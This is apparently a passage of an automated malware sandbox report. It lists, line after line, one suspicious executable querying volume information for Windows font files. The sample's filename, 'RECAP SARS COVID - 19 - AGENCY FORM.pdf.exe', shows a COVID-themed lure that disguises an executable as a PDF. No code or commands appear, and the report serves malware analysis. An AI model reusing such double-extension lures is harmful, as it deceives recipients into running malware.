                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
